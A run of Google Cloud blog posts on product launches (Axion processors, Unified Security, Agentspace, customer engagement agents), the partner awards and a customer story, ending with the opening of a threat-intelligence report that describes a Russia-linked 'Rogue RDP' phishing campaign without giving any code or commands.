Broadcom is driving its digital transformation by optimizing its compute and data landscape through a strategic VMware migration to Google Cloud — and boosting employee efficiency with the deployment of Gemini Code Assist.
Broadcom engaged a group of experts from Google Cloud Consulting to efficiently migrate twelve SaaS products, including their data infrastructures, while maintaining zero downtime. This unified data environment empowers Broadcom to access and analyze data with greater efficiency, leading to deeper product insights and enhanced customer experiences.
Furthermore, Broadcom is rolling out Gemini Code Assist to their employees, through a robust enablement program led by Google Cloud Consulting that features hands-on training, accessible office hours, and ongoing chat support.
Building the future together
At Google Cloud Consulting, we’re passionate about empowering businesses to thrive in the cloud and AI era. We’re committed to guiding customers every step of the way, from initial planning and implementation to ongoing optimization. Contact us today to discover how we can help you achieve your business objectives in this new era of technology.
Last year we announced Google Axion processors, our first custom Arm®-based CPUs. We built Axion to address our customers’ need for general-purpose processors that maximize performance, reduce infrastructure costs, and help them meet their sustainability goals.
Since then, Axion has shaken up the market for cloud compute. Customers love its price-performance — up to 65% better than current-generation x86 instances. It even outperforms leading Arm-based alternatives by up to 10%. Axion C4A instances were also the first virtual machines to feature new Google Titanium SSDs, with up to 6TB of high-performance local storage, up to 2.4M random read IOPS, up to 10.4 GiB/s of read throughput, and up to 35% lower access latency compared to previous-generation SSDs. In fact, in the months since launch, over 40% of Compute Engine’s top 100 customers are using Axion, thousands of Google’s internal applications are now running on Axion, and we continue to expand integration of C4A and Axion with our most popular Google Cloud’s products and partner solutions.
Today, we are excited to share that Cloud SQL and AlloyDB for PostgreSQL managed databases are available in preview on C4A virtual machines,providing significant price-performance advantages for database workloads. To utilize Axion processors today, you can now choose to host your database on a C4A VM from directly within the console.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3ea4dcf923d0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
Supercharging database workloads
Organizations with business-critical database workloads need high-performance, cost-efficient, available, and scalable infrastructure. However, a surge of data growth alongside higher and more complex processing requirements are creating challenges.
C4A instances bring significant advantages to managed Google Cloud database workloads: improved price-performance compared to x86 instances, translating to more cost-effective database operations. Designed to handle data-intensive workloads requiring real-time processing, C4A is well-suited for high-performance databases and analytics engines.
When running on C4A instances, AlloyDB and Cloud SQL provide nearly 50% better price-performance than N series VMs for transactional workloads, and up to 2x better throughput than Amazon’s equivalent Graviton 4 offerings.
“At Mercari, we deploy thousands of Cloud SQL instances across engines and editions to meet our diverse database workload requirements. At our scale, it is critical to optimize our fleet to run more efficiently. We are excited to see the price-performance improvements on the new Axion-based C4A machine series for Cloud SQL. We look forward to adopting C4A instances in our MySQL and PostgreSQL fleet and taking advantage of the C4A’s high-performance while at the same time reducing our operational costs.” – Takashi Honda, Database Reliability Engineer, Mercari
We’ve also expanded regional availability for Axion and C4A. It is now broadly available across 10 Google Cloud Regions, which will expand to 15 Google Cloud Regions in the coming months. Cloud SQL and AlloyDB on Axion is now available in eight regions, with more to be added before the end of the year.
Google’s internal fleet and top customers choose Axion
Given its price-performance, it’s no surprise that in less than a year, Axion is a popular choice for Google internal applications and top Compute Engine customers, including Spotify:
“As the world’s most popular audio streaming subscription service, reaching over 675 million users, Spotify demands exceptional performance and efficiency. We are in the process of migrating our entire compute infrastructure to Axion and this is yielding remarkable results. We’re witnessing a staggering 250% performance increase, significantly enhancing the user experience, as much as 40% reduction in compute costs, and a drastic reduction in compute management toil, allowing us to reinvest in further innovation and growth.” – Dave Zolotusky, Principal Engineer, Spotify
And we’re only just getting started. We’re also making it easier for Google Cloud customers to benefit from Axion’s price-performance without having to refactor their applications. Google Cloud customers can already use C4A VMs in Compute Engine, Google Kubernetes Engine (GKE), Batch, Dataproc, Dataflow, and more services.
Expanding the Axion and Arm ISV ecosystem
Axion processors are delivering undeniable value for customers and ISVs looking for security, efficiency and competitive price-performance for data processing. We’re pleased to report that ClickHouse, Databricks, Elastic, MongoDB, Palo Alto Networks, Redis Labs, and Starburst have all chosen Axion to power their data processing products — with support from many more ISVs on the way. This commitment is notable as ISVs often choose Axion over alternative processors, including Arm-based processors from other cloud providers.
01
02
03
04
05
06
Enhancing diverse ML inference workloads
Machine learning (ML) inference workloads span traditional embedding models to modern generative AI applications, each with unique price performance needs that defy a one-size-fits-all approach. The range of inference tasks, from low-latency real-time predictions to high-throughput batch processing, necessitates infrastructure designed for specific workload requirements.
Google’s Axion C4A VMs deliver exceptional performance for ML workloads through architectural strengths like the Arm Neoverse V2 compute cores, with high single-threaded performance and memory bandwidth per-core for predictable, high-throughput execution, and Google’s Titanium offload system technology for reduced overhead. With up to 72 vCPUs, 576 GB of DDR5 memory, and advanced SIMD processing capabilities, Axion C4A excels at matrix-heavy inference tasks. Combined with its easy obtainability, operational familiarity, and up to 60% better energy efficiency compared to x86 alternatives, Axion offers a compelling CPU-based ML inference platform, alongside GPUs and TPUs.
In particular, Axion is well-suited for real-time serving of recommendation systems, NLP, threat detection, and image recognition models. As large language models (LLMs) with lower parameter counts (3-8B) grow increasingly capable, Axion can also be a viable platform for serving these models efficiently.
Customers have recognized this Axion strength and are actively deploying ML inference workloads on C4A VMs to capitalize on its blend of performance, cost-effectiveness, and scalability, proving it a worthy complement to GPU-centric strategies. Palo Alto Networks uses C4A as part of their diversified ML infrastructure platform strategy and realized 85% performance TCO efficiency by migrating their threat detection inference application from L4 GPUs to C4A.
“By migrating to Axion on Google Cloud, our testing shows that DNS Security will see a 85% improvement in price-performance, a 2X decrease in latency for DNS queries, and a 85% cost savings compared to instances with mid-range GPUs, enhancing our ML-powered DGA detections for customers.” – Fan Fei, Director of Engineering, Palo Alto Networks
Learn more about Axion-based C4A virtual machines
In their quest to balance performance, efficiency, and cost, more and more organizations are turning to Arm architecture. Axion’s strong price-performance combined with a growing ecosystem of support by mission-critical workloads makes it a compelling choice. We’ve seen incredible excitement for Axion-based C4A virtual machines from our customers and partners, and we can’t wait to see what you can build with Axion, too.Try Cloud SQL and AlloyDB running on C4A virtual machines today.
Today at Google Cloud Next, we are announcing Google Unified Security, new security agents, and innovations across our security portfolio designed to deliver stronger security outcomes and enable every organization to make Google a part of their security team.
Introducing Google Unified Security
Enterprise infrastructure continues to grow in size and complexity, expanding the attack surface, and making defenders’ jobs increasingly difficult. Separate, disconnected security tools result in fragmented data without relevant context, leaving organizations vulnerable and reactive in the face of escalating threats. Security teams operate in silos, slowed by toilsome workflows, making it hard to accurately assess and improve the organization’s overall risk profile.
To address this challenge, we are bringing together our best-in-class security products for threat intelligence, security operations, cloud security, and secure enterprise browsing, along with Mandiant expertise, into a converged security solution powered by AI: Google Unified Security.
Now generally available, Google Unified Security lays the foundation for superior security outcomes. It creates a single, scalable, searchable security data fabric across the entire attack surface. It provides visibility, and detection and response capabilities, across networks, endpoints, clouds, and apps. It automatically enriches security data with the latest Google Threat intelligence for more effective detection and prioritization. Crucially, Google Unified Security makes every aspect of the practitioner experience more efficient with Gemini.
“Google Unified Security represents a step forward in achieving better security outcomes with the integration of browser behavior, managed threat hunting, and security validation to strategically eliminate coverage gaps and simplify security management and threat detection and response. This approach offers organizations a more holistic and streamlined defense against today’s complex threat landscape,” said Michelle Abraham, senior research director, Security and Trust, IDC.
At the heart of Google Unified Security’s capabilities lie its integrated product experiences, exemplified by:
Browser telemetry and asset context from Chrome Enterprise integrated into Google Security Operations to power threat detections and remediation actions.
Google Threat Intelligence integrated with security validation to proactively understand exposures and test security controls against the latest observed threat actor activity.
Cloud risks and exposures from Security Command Center, including those impacting AI workloads, enriched with integrated Google Threat Intelligence to more effectively threat hunt and triage incidents.
Infused with new semi-autonomous AI capabilities, these integrated products provide preemptive security, enabling organizations to anticipate threats and remediate risks before attackers can act to cause business damage or loss.
“I see Google and its security suite as one of the top partnerships that I have within my organization. The value they bring, the expertise and the knowledge, the willingness to play with us to explore new opportunities and to look at new areas — it makes them a true partner and someone that we’re very happy to be working together with,” said Craig McEwen, deputy CISO, Unilever.
“Accenture and Google Cloud partner to help clients achieve the cyber resilience their businesses need to stay ahead of today’s threats. By integrating advanced threat intelligence, comprehensive visibility and AI assistance, we can help organizations shift from reactive to proactive and agile responses,” said Paolo Dal Cin, global lead, Accenture Security. “This unified approach, powered by Google Unified Security, can help us deliver a new standard of cyber resilience with greater scale, speed and effectiveness.”
“Deloitte Cyber and Google Cloud are working closely together to secure the modern enterprise – which includes using the leadingcapabilities from both Deloitte and Google to protect data, users, and applications. Google Unified Security brings together a centralized data fabric, integrated threat intelligence, unified SOC and cloud workflows, and agentic AI automation — creating a powerful platform to drive our clients’ security transformation,” said Adnan Amjad, principal, U.S. cyber leader, Deloitte & Touche LLP.
Security agents and Gemini
Agentic AI is powering a fundamental shift in how security operations are conducted. Our vision is a future where intelligent agents work alongside human analysts, offloading routine tasks, augmenting their decision-making, and freeing them to focus on complex issues. Today we’re introducing the following new Gemini in Security agents:
In Google Security Operations, an alert triage agent performs dynamic investigations on behalf of users. Expected to preview for select customers in Q2 2025, this agent analyzes the context of each alert, gathers relevant information, and renders a verdict on the alert, along with a history of the agent’s evidence and decision making. This always-on investigation agent will vastly reduce the manual workload of Tier 1 and Tier 2 analysts who otherwise are triaging and investigating hundreds of alerts per day.
In Google Threat Intelligence, a malware analysis agent investigates whether code is safe or harmful. Expected to preview for select customers in Q2 2025, this agent analyzes potentially malicious code, including the ability to create and execute scripts for deobfuscation. Ultimately, the agent summarizes its work and provides a final verdict.
These agentic AI advancements aim to deliver faster detection and response, with complete visibility and streamlined workflows. They represent a catalyst for security teams to reduce toil, build true cyber-resilience, and drive strategic program transformation.
What’s new in Google Security Operations
New data pipeline management capabilities, now generally available,can help customers better manage scale, reduce costs, and satisfy compliance mandates. Expanding our partnership with Bindplane, you can now transform and prepare data for downstream use; route data to different destinations and multiple tenants to manage scale; filter data to control volume; and redact sensitive data for compliance.
The new Mandiant Threat Defense service for Google Security Operations, now generally available, provides comprehensive active threat detection, hunting, and response. Mandiant experts work alongside customer security teams, using AI-assisted threat hunting techniques to identify and respond to threats, conduct investigations, and scale response through security operations SOAR playbooks, effectively extending customer security teams.
What’s new in Security Command Center
We recently announced AI Protection capabilities for managing risk across the AI lifecycle for Google Cloud customers. AI Protection helps discover AI inventory, secure AI models and data, and detect and respond to threats targeting AI systems.
Model Armor, which is generally available and part of AI Protection, allows you to apply content safety and security controls to prompts and responses for a broad range of models across multiple clouds. Model Armor is now integrated directly with Vertex AI so developers can automatically route prompts and responses for protection without any changes to applications.
New Data Security Posture Management (DSPM) capabilities, coming to preview in June, can enable discovery, security, governance, and monitoring of sensitive data including AI training data. DSPM can help discover and classify sensitive data, apply data security and compliance controls, monitor for violations, and enforce access, flow, retention, and protection directly in Google Cloud data analytics and AI products.
A new Compliance Manager, launching in preview at the end of June, will combine policy definition, control configuration, enforcement, monitoring, and audit into a unified workflow. It builds on the configuration of infrastructure controls delivered using Assured Workloads, providing Google Cloud customers with an end-to-end view of their compliance state, making it easier to monitor, report, and prove compliance to auditors with Audit Manager.
Other Security Command Center enhancements include:
Integration with Snyk’s developer security platform, in preview, to help teams find and fix software vulnerabilities faster.
New Security Risk dashboards for Google Compute Engine and Google Kubernetes Engine, generally available, which deliver insights into top security findings, vulnerabilities, and open issues directly in the product consoles.
We are also expanding our Risk Protection Program, which provides discounted cyber-insurance coverage based on cloud security posture. We’re thrilled to welcome Beazley and Chubb, two of the world’s largest cyber-insurers, as new program partners to expand customer choice and broaden international coverage.
As part of the program, our partners provide affirmative AI insurance coverage, exclusively for Google Cloud customers and workloads. Chubb will also offer coverage for risks resulting from quantum exploits, proactively helping to address the risk of quantum computing attacks.
What’s new in Chrome Enterprise
New employee phishing protections in Chrome Enterprise Premium use Google Safe Browsing data to help protect employees against lookalike sites and portals attempting to capture credentials. Organizations can now configure and add their own branding and corporate assets to help identify phishing attempts disguised on internal domains.
Organizations continue to benefit from the simple and effective data protections in Chrome. In addition to watermarking and screenshot blocking, and controls for copy, paste, upload, download, and printing, Chrome Enterprise Premium data masking is now generally available. We’re also extending key enterprise browsing protections to Android, including copy and paste controls, and URL filtering.
What’s new in Mandiant Cybersecurity Consulting
TheMandiant Retainer provides on-demand access to Mandiant experts with pre-negotiated terms and two-hour incident response times. Customers now have additional flexibility to redeem pre-paid funds for investigations, education, and intelligence to boost their expertise and resilience.
Mandiant Consulting is also partnering with Rubrik and Cohesity to create a solution to minimize downtime and recovery costs after a cyberattack. Together, Mandiant consultants and our data backup and recovery partners can help customers establish, test, and validate a cloud-isolated recovery environment (CIRE) for critical applications on Google Cloud, and deliver incident response services in the event of a compromise.
What’s new for Trusted Cloud
We continue regular delivery of new security controls and capabilities on our cloud platform to help organizations meet evolving policy, compliance, and business objectives. Today we’re announcing the following updates:
For Sovereign Cloud:
Google Cloud has brought to market the industry’s broadest portfolio of sovereign cloud solutions, providing customers with choice to meet the unique and evolving requirements for data, operational, and software sovereignty. Google Cloud offers Regional and Sovereign Controls across 32 regions in 14 countries. We also offer Google Cloud Sovereign AI services in our public cloud, sovereign cloud, and distributed clouds, as well as with Google Workspace.
We’ve partnered with Thales to launch the S3NS Trusted Cloud, now in preview, designed to meet France’s highest level of cloud certification, the SecNumCloud standard, defined by the National Cyber Agency. It is the first sovereign cloud offering based on Google Cloud platform, that is in this case operated, majority-owned and fully controlled by a European organization.
For Identity and Access Management:
Unified access policies, coming to preview in Q2, create a single definition forIAM allow andIAM deny policies, enabling you to more consistently apply fine grained access controls.
We’re also expanding our Confidential Computing offerings. Confidential GKE Nodes with AMD SEV-SNP and Intel TDX will be generally available in Q2, requiring no code changes to secure your standard GKE workloads. Confidential GKE Nodes with NVIDIA H100 GPUs on the A3 machine series will be in preview in Q2, offering confidential GPU computing without code modifications.
Single-tenant Cloud Hardware Security Module (HSM), now in preview, provides dedicated, isolated HSM clusters managed by Google Cloud, while granting customers full administrative control.
For network security:
Network Security Integration allows enterprises to easily insert third-party network appliances and service deployments to protect Google Cloud workloads without altering routing policies or network architecture. Out-of-band integrations with ecosystem partners are generally available now, while in-band integrations are available in preview.
DNS Armor, powered by Infoblox Threat Defense, coming to preview later this year, uses multi-sourced threat intelligence and powerful AI/ML capabilities to detect DNS-based threats.
Cloud Armor Enterprise now includes hierarchical policies for centralized control and automatic protection of new projects, available in preview.
Cloud NGFW Enterprise supports L7 domain filtering capabilities to monitor and restrict egress web traffic to only approved destinations, coming to preview later this year.
Secure Web Proxy (SWP) now includes inline network data loss protection capabilities through integrations with Google’s Sensitive Data Protection and Symantec DLP using service extensions, available in preview.
Take the next step
These announcements just scratch the surface of the outcomes we can deliver when we converge our security capabilities and infuse them with AI and our frontline intelligence.
In today’s threat landscape, one of the most critical choices you need to make is who will be your strategic security partner, and Google Unified Security is the best, easiest, and fastest way to make Google part of your security team.
For more on our Next ‘25 announcements, you can watch our security spotlight, and check out the many great security breakout sessions at Next ‘25 — live and on-demand.
AI agents are a major leap from traditional automation or chatbots. They can execute complex workflows, from planning and research, to generating and testing novel ideas. But to scale, businesses need an AI-ready information ecosystem that can work across silos, easy ways to create and adopt agents, and enterprise-grade security and compliance.
That’s why we launched Google Agentspace in December. This product puts the latest Google foundation models, powerful agents, and actionable enterprise knowledge in the hands of employees. With Agentspace, employees and agents can find information from across their organization, synthesize and understand it with Gemini’s multimodal intelligence, and act on it with AI agents.
Since the launch, we have seen tremendous interest in Agentspace from leading organizations like Banco BV, Cohesity, Gordon Food Services, KPMG, Rubrik, Wells Fargo, and more.
We’re accelerating this momentum by expanding Agentspace, currently generally available via allowlist, to make creating and adopting agents simpler. Starting today, customers can:
Give employees access to Agentspace’s unified enterprise search, analysis, and synthesis capabilities, directly from the search box in Chrome
Discover and adopt agents quickly and easily with Agent Gallery, and create agents with our new no-code Agent Designer
Deploy Google-built agents such as our new Deep Research and Idea Generation agents to help employees generate and validate novel business ideas, synthesize dense information, and more
“We recently began our roll out of Google Agentspace to US employees at Gordon Food Service, with the goal of empowering them with greater access to our enterprise intelligence. This implementation has already started to transform how we access enterprise knowledge, wherever it is, as our searches are now grounded in our data across Google Workspace and other sources like ServiceNow. Employees are benefitting from easier access because they can search across multiple systems in one place, which translates to better decision-making, and less legwork to discover information. Ultimately, Agentspace will enhance both our internal operations and product development. enabling us to serve our customers better.” – Matt Jansen, Manager of Emerging Technology, Gordon Food Service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2a46141a60>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Unified agentic search, directly from search box in Chrome
Imagine being able to find any piece of information within the organization – whether that’s text, images, websites, audio, and video – with the ease and power of Google-quality search. That’s what we’re bringing to enterprises with Google’s AI-powered multimodal search capabilities in Agentspace, helping customers to find what they need, regardless of how – and where – it’s stored. Whether the right information resides in common work apps like Google Workspace, Microsoft 365, apps like Jira, Salesforce, or ServiceNow, or in content from the web, Agentspace breaks down silos and understands organizational context. By building an enterprise knowledge graph for each customer — connecting employees with their team, documents they have created, software and data they can access, and more — it helps turn disjointed content into actionable knowledge.
Starting today in preview, Agentspace is integrated with Chrome Enterprise, letting employees leverage Agentspace’s unified search capabilities right from the search box in Chrome. Bringing Agentspace directly into Chrome will help employees easily and securely find information, including data and resources, right within their existing workflows.
Find data within your existing workflows directly from the search box in Chrome
Fast, simple agent adoption and creation
Google Agentspace provides employees – no matter their technical expertise – with access to specialized agents connected to various enterprise systems, so employees can integrate agents into their workflows and priorities with ease. We’re introducing two new features to help employees adopt and create agents for their specific needs:
Agent Gallery, generally available with allowlist, gives employees a single view of available agents across the enterprise, including those from Google, internal teams, and partners — making agents easy to discover and use. Customers can choose agents published by partners in Google Cloud Marketplace, then enable them in Agent Gallery, adding to our agent ecosystem and options for customers.
Agent Designer, in preview with allowlist, is a no-code interface for creating custom agents that connect to enterprise data sources and automate or enhance everyday knowledge work tasks. This helps employees – even those with limited technical experience – create agents suited to their individual workflows and needs. Thanks to deep integration between our products, Agent Designer complements the deeper, developer-first approaches available in Vertex AI Agent Builder, and agents built in Vertex AI Agent Builder can be published to Agentspace.
Powerful new expert agents: Idea Generation agent and Deep Research agent
As part of the Agent Gallery launch, two new, Google-built expert agents will join the previously-available NotebookLM for Enterprise:
Deep Research agent, generally available with allowlist, explores complex topics on the employee’s behalf, synthesizing information across internal and external sources into comprehensive, easy-to-read reports — all with a single prompt.
Idea Generation agent, available in preview with allowlist, helps employees innovate by autonomously developing novel ideas in any domain, then evaluating them to find the best solutions via a competitive system inspired by the scientific method.
Create a multi-agent innovation session with Idea Generation agent
Beyond expert agents, Agentspace supports the new open Agent2Agent (A2A) Protocol, which is designed to let agents across different ecosystems communicate with each other. As the first hyperscaler to drive this initiative for the industry, we believe this protocol will be critical to support multi-agent communication by giving agents a common language – regardless of the framework or vendor they are built on. This allows developers to choose the tools and frameworks that best suit their needs.
Enterprise-grade data protections and security
Agentspace was built on the same secure Google infrastructure trusted by billions of people. It is enterprise-ready, so as agents collaborate with employees and access corporate data, security, monitoring, and other essential requirements remain at the forefront.
It lets customers scan systems for sensitive information, such as PHI or PII data, or confidential elements, then choose whether to block these assets from agents and search. It also provides role-based access controls, encryption with customer-managed keys, data residency guarantees, and more.
We’re also growing the AI Agent Marketplace, a dedicated section within Google Cloud Marketplace. Customers can easily browse and purchase AI agents from partners such as Accenture, Deloitte, and more. Enterprise admins can make these agents available within Agentspace for added productivity and innovation. The growing variety of options lets each employee build and manage a team of agents to help them work — and we look forward to more innovation in the months to come.
Get started with Google Agentspace
As the ability to adopt and customize agents becomes more essential, we’re ready to take this journey with you — and excited to see what you accomplish with Agentspace.
Envision a future where every customer interaction is not only seamless and personalized, but delivers enduring experiences that build brand loyalty.
Today, AI agents are already transforming the ways businesses engage with customers — including advanced conversational agents. In fact, these conversational AI agents are enabling new levels of hyper-personalized, multimodal conversations with customers, and it’s improving customer interactions across all touchpoints.
And this is just the beginning.
While deploying AI for customer service is not entirely new, traditional deployments were limited in their ability to deliver personalized customer experiences at scale. Google Cloud’s Customer Engagement Suite was created to address these gaps through an end-to-end AI customer experience application that’s built with Google’s planet-scale capacity, performance, and quality. Customer Engagement Suite allows customers to connect with your business across any channel — such as web, mobile, email or voice — offering a consistent, personalized experience wherever you connect.
Recently we announced new AI-enabled capabilities to the four products within the Customer Engagement Suite — Conversational Agents, Agent Assist, Conversational Insights, and Google Cloud Contact Center-as-a-Service.
The Conversational Agentsproduct, helps customers build virtual agents that provide self-service experiences for customer service needs. Today we are unveiling a completely revamped and powerful new product for building and running generative and agentic conversational agents. This next generation Conversational Agents product will enable teams to create highly interactive, enterprise-grade AI agents in just a few keystrokes.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e2a303998b0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The next generation of Conversational Agents
The leading capabilities provided by the next generation of the product include:
Simplifying how AI agents are built: Building AI agents has traditionally required specialized technical expertise. The next generation of Conversational Agents will use the latest Gemini models and Agent Development Kit, along with a comprehensive suite of enterprise-grade features such as privacy controls and AI observability. These power a no-code console that enables even non-technical employees to build complex conversational AI agents that deliver exceptional customer experiences in just a few clicks.
Enabling highly engaging customer experiences: The latest Gemini models enable human-like, high-definition voices; a higher degree of comprehension; and the ability to understand emotions — which all can help AI agents adapt during conversations. The product also supports streaming video, so the agents can interpret and respond to what they see in real-time when shared from customer devices.
Automating work across operations: Earlier we introduced out-of-the-box connectors to provide easy integration with the most popular customer relationship management (CRM) systems, data sources, and business messaging platforms. With the next generation of Conversational Agents, enterprise users will have a variety of tools to interact and perform specific tasks, such as look up products, add to cart, and check out with their applications through API calls.
Over the last year, our portfolio of conversational AI agents and applications has helped companies enhance customer experiences and turn them into moments of brand loyalty, both within their customer service operations and beyond.
Verizon transforms customer experiences with Customer Engagement Suite
Verizon is transforming how they serve their more than 115 million wireless connections with the help of Customer Engagement Suite. Human assisted AI-powered agents have helped customers with a range of day-to-day tasks, in stores and over the phone.
Verizon’s Personal Research Assistant provides the company’s 28,000 customer care representatives with the information they need to answer a customer’s question instantly, and personalized for their unique needs. Able to answer 95% of questions, the Personal Research Assistant reduces the cognitive load so care representatives can focus on the customer, leading to faster and more satisfying resolutions.
“At Verizon, we’re focused on transforming every customer interaction into a moment of genuine connection,” said Sampath Sowmyanarayan, chief executive officer, Verizon Consumer Group. “Google’s Customer Engagement Suite allows us to deliver faster, more personalized service, significantly reducing call times and empowering our team to focus on what truly matters: our customers. This human in the loop technology is not just about ease and simplicity; it’s about building lasting loyalty through exceptional experiences.”
Wendy’s and MercedesBenz deliver exceptional conversational experiences with vertical AI agents
We are also helping companies deliver great customer experiences beyond the contact center — meeting customers where they are, whether it’s in-store, in vehicles, or on personal devices like smartphones. We do this by providing readily deployable vertical AI agents that address specific real-world use cases.
This includes, the Food Ordering AI Agent, which delivers accurate, consistent, multilingual experiences, and the Automotive AI Agent, which offers deeply personalized, in-vehicle experiences.
Wendy’s is expanding their FreshAI deployment across 24 states. This drive-thru ordering system uses our Food Ordering AI Agent to handle 50,000 orders daily, in multiple languages, with a 95% success rate.
MercedesBenz is providing advanced conversational capabilities, including conversational search and navigation in the new CLA series this year, by integrating our Automotive AI Agent into their MBUX Virtual Assistant.
Take the next step
Read more about how organizations of all sizes across all industries are transforming customer experience with Customer Engagement Suite in this recent blog.
Watch the Google NEXT keynote and join us at the AI in Action showcase for a live demonstration of the Conversational Agents.
Schedule a free consultation with Google’s AI specialists to identify specific use cases and applications that will help your organization deliver similar business impact results.
It’s an honor to announce the 2025 Google Cloud Partner of the Year winners!
It takes a lot to build great AI and cloud technology. Advancements and innovation come from collaboration, and Google Cloud has thousands of partners to make this happen. Among these, we’re excited to recognize dozens who take our work to the next level. These distinguished partners have demonstrated incredible dedication, innovation, and collaboration in delivering impactful solutions that drive success for our customers. Their contributions to the Google Cloud community are truly remarkable and deserve to be recognized.
Please join us in congratulating the winners in the following categories on their outstanding achievements.
Global
This award celebrates top global partners who exemplify excellence in their category, driving innovation and delivering industry-leading solutions with Google Cloud. With a customer-first approach, these partners have demonstrated outstanding leadership, impact, and commitment to transforming businesses worldwide.
Country
This award honors top partners who have demonstrated expertise in leveraging their services and solutions in their country or region to drive sales and deliver outstanding outcomes for Google Cloud customers.
Industry Solutions
Partners receiving this award have leveraged Google Cloud capabilities to create comprehensive and compelling solutions that made a significant impact in one or more industries across multiple regions.
Technology
This award recognizes partners who used a winning combination of Google Cloud technology in a specific technology segment to deliver innovative solutions and customer satisfaction.
Business Applications
Winners of this award have leveraged Google Cloud capabilities to create comprehensive and compelling technology solutions that made a significant impact in one industry across multiple regions.
Artificial Intelligence
This award recognizes partners who helped customers leverage generative AI in 2024 to achieve outstanding success through Google Cloud technology.
Data & Analytics
Partners receiving this award have expertly migrated or deployed new Google Cloud data analytics solutions to help customers extract actionable insights from their data, fueling business transformation.
Databases
This award recognizes partners who have successfully implemented and optimized Google Cloud’s database solutions, enabling their customers to manage data efficiently, securely, and at scale.
Google Workspace
This category honors partners who have excelled in driving sales and delivering outstanding services for Google Workspace, empowering customers with transformative solutions for collaboration and productivity.
Infrastructure Modernization
This award recognizes partners who have helped customers modernize their infrastructure by leveraging Google Cloud’s innovative solutions to increase agility, scalability, and cost-efficiency.
Public Sector
Winners of this award have provided exceptional service and enabled the success of their public sector customers by innovating, building, and delivering the right combination of solutions.
Security
This category honors partners who have effectively implemented Google Cloud’s security solutions, safeguarding their customers’ data and infrastructure from evolving threats.
Talent Development
Partners receiving this award have demonstrated a commitment to growing their team’s cloud skills through training, upskilling, and reskilling their workforce on leading-edge technology with Google Cloud certifications.
Training
Winners of this award have provided exceptional training services and enabled customer success by innovating, building, and delivering the right combination of Google Cloud solutions through learning.
Social Impact
This award recognizes partners who have demonstrated exceptional commitment to driving positive social impact through innovative solutions and initiatives within their organizations.
Once again, congratulations to our 2025 Google Cloud Partner of the Year winners. It’s our privilege to recognize you for all of the groundbreaking work that you do. We look forward to another future-defining year of innovation and collaboration in the cloud.
In October 2024, Google Threat Intelligence Group (GTIG) observed a novel phishing campaign targeting European government and military organizations that was attributed to a suspected Russia-nexus espionage actor we track as UNC5837. The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims’ machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities like file exfiltration and clipboard capture. This technique has been previously dubbed as “Rogue RDP.”
The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. While we did not observe direct command execution on victim machines, the attackers could present deceptive applications for phishing or further compromise. The primary objective of the campaign appears to be espionage and file theft, though the full extent of the attacker’s capabilities remains uncertain. This campaign serves as a stark reminder of the security risks associated with obscure RDP functionalities, underscoring the importance of vigilance and proactive defense.
Introduction
Remote Desktop Protocol (RDP) is a legitimate Windows service that has been wellresearched by the security community. However, most of the security community’s existing research is focused on the adversarial use of RDP to control victim machines via interactive sessions.
This campaign included use of RDP that was not focused on interactive control of victim machines. Instead, adversaries leveraged two lesser-known features of the RDP protocol to present an application (the nature of which is currently unknown) and access victim resources. Given the low prevalence of this tactic, technique, and procedure (TTP) in previous reporting, we seek to explore the technical intricacies of adversary tradecraft abusing the following functionality of RDP:
RDP Property Files (.rdp configuration files)
Resource redirection (e.g. mapping victim file systems to the RDP server)
RemoteApps (i.e. displaying server-hosted applications to victim)
Additionally, we will shed light on PyRDP, an open-source RDP proxy tool that offers attractive automation capabilities to attacks of this nature.
By examining the intricacies of the tradecraft observed, we gain not only a better understanding of existing campaigns that have employed similar tradecraft, but of attacks that may employ these techniques in the future.
Campaign Operations
This campaign tracks a wave of suspected Russian espionage activity targeting European government and military organizations via widespread phishing. Google Threat Intelligence Group (GTIG) attributes this activity to a suspected Russia-nexus espionage actor group we refer to as UNC5837. The Computer Emergency Response Team of Ukraine (CERT-UA) reported this campaign on Oct. 29, 2024, noting the use of mass-distributed emails with.rdp file attachments among government agencies and other Ukrainian organizations. This campaign has also been documented by Microsoft, TrendMicro, and Amazon.
The phishing email in the campaign claimed to be part of a project in conjunction with Amazon, Microsoft, and the Ukrainian State Secure Communications and Information Security Agency. The email included a signed .rdp file attachment purporting to be an application relevant to the described project. Unlike more common phishing lures, the email explicitly stated no personal data was to be provided and if any errors occurred while running the attachment, to ignore it as an error report would be automatically generated.
Figure 1: Campaign email sample
Executing the signed attachment initiates an RDP connection from the victim’s machine. The attachment is signed with a Let’s Encrypt certificate issued to the domain the RDP connection is established with. The signed nature of the file bypasses the typical yellow warning banner, which could otherwise alert the user to a potential security risk. More information on signature-related characteristics of these files are covered in a later section.
The malicious .rdp configuration file specifies that, when executed, an RDP connection is initiated from the victim’s machine while granting the adversary read & write access to all victim drives and clipboard content. Additionally, it employs the RemoteApp feature, which presents a deceptive application titled “AWS Secure Storage Connection Stability Test” to the victim’s machine. This application, hosted on the attacker’s RDP server, masquerades as a locally installed program, concealing its true, potentially malicious nature. While the application’s exact purpose remains undetermined, it may have been used for phishing or to trick the user into taking action on their machine, thereby enabling further access to the victim’s machine.
